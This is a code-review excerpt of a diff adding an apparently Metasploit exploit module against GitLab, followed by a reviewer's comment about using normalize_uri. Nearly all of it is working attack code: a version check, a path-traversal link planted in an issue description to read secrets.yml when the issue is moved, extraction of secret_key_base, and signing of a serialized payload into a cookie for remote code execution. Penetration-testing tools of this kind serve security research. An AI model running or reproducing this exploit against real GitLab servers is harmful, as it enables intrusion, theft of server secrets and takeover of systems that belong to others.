modules/exploits/multi/http/gitlab_file_read_rce.rb

```diff
@@ -0,0 +1,537 @@
+          ":\t@var\"\f@result" \
+        ":\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06:\x06ET"
+  end
+
+  def sign_payload(secret_key_base, payload)
+    key_generator = KeyGenerator.new(secret_key_base, { iterations: datastore['KEY_GENERATOR_ITERATIONS'] })
+    key = key_generator.generate_key(datastore['SIGNED_COOKIE_SALT'])
+    verifier = MessageVerifier.new(key, { serializer: NoopSerializer.new })
+    verifier.generate(payload)
+  end
+
+  def check
+    git_lab_client = GitLabClient.new(self)
+    git_lab_client.sign_in(datastore['USERNAME'], datastore['PASSWORD'])
+    version = Gem::Version.new(git_lab_client.version['version'][/(\d+.\d+.\d+)/, 1])
+
+    # Arbitrary file reads are present from 8.5 and fixed in 12.9.1, 12.8.8, and 12.7.8
+    # However, RCE is only available from 12.4 and fixed in 12.9.1, 12.8.8, and 12.7.8
+    has_rce_present = (
+      version.between?(Gem::Version.new('12.4.0'), Gem::Version.new('12.7.7')) ||
+        version.between?(Gem::Version.new('12.8.0'), Gem::Version.new('12.8.7')) ||
+        version == Gem::Version.new('12.9.0')
+    )
+    if has_rce_present
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  rescue GitLabClientException => e
+    Exploit::CheckCode::Unknown(e.message)
+  end
+
+  def exploit
+    git_lab_client = GitLabClient.new(self)
+    user = git_lab_client.sign_in(datastore['USERNAME'], datastore['PASSWORD'])
+    print_status("Logged in to user #{user['username']}")
+
+    project_a = git_lab_client.create_project(user: user)
+    print_status("Created project #{project_a['path']}")
+    project_b = git_lab_client.create_project(user: user)
+    print_status("Created project #{project_b['path']}")
+
+    issue = git_lab_client.create_issue(
+      project: project_a,
+      issue: {
+        'description' => "![#{Rex::Text.rand_text_alphanumeric(8)}](/uploads/11111111111111111111111111111111#{'/..' * datastore['DEPTH']}#{datastore['SECRETS_PATH']})"
+      }
+    )
+    print_status("created issue #{issue['path']}")
+
+    print_status('Executing arbitrary file load')
+    moved_issue = git_lab_client.move_issue(issue: issue, target_project: project_b)
+    secrets_file_url = moved_issue['description'][/\[secrets.yml\]\((.*)\)/, 1]
+    secrets_yml = git_lab_client.download(project: project_b, path: secrets_file_url)
+    loot_path = store_loot('gitlab.secrets', 'text/plain', datastore['RHOST'], secrets_yml, 'secrets.yml')
+    print_good("File saved as: '#{loot_path}'")
+
+    secret_key_base = secrets_yml[/secret_key_base:\s+(.*)/, 1]
+    if secret_key_base.nil?
+      fail_with(Failure::UnexpectedReply, 'Unable to successfully extract leaked secret_key_base value')
+    end
+    print_good("Extracted secret_key_base #{secret_key_base}")
+
+    payload = build_payload
+    signed_cookie = sign_payload(secret_key_base, payload)
+    send_request_cgi({
+      'uri' => datastore['TARGETURI'] || '/',
```

Comment:
You'll want to use `normalize_uri`.

```suggestion
      'uri' => normalize_uri(target_uri.path),
```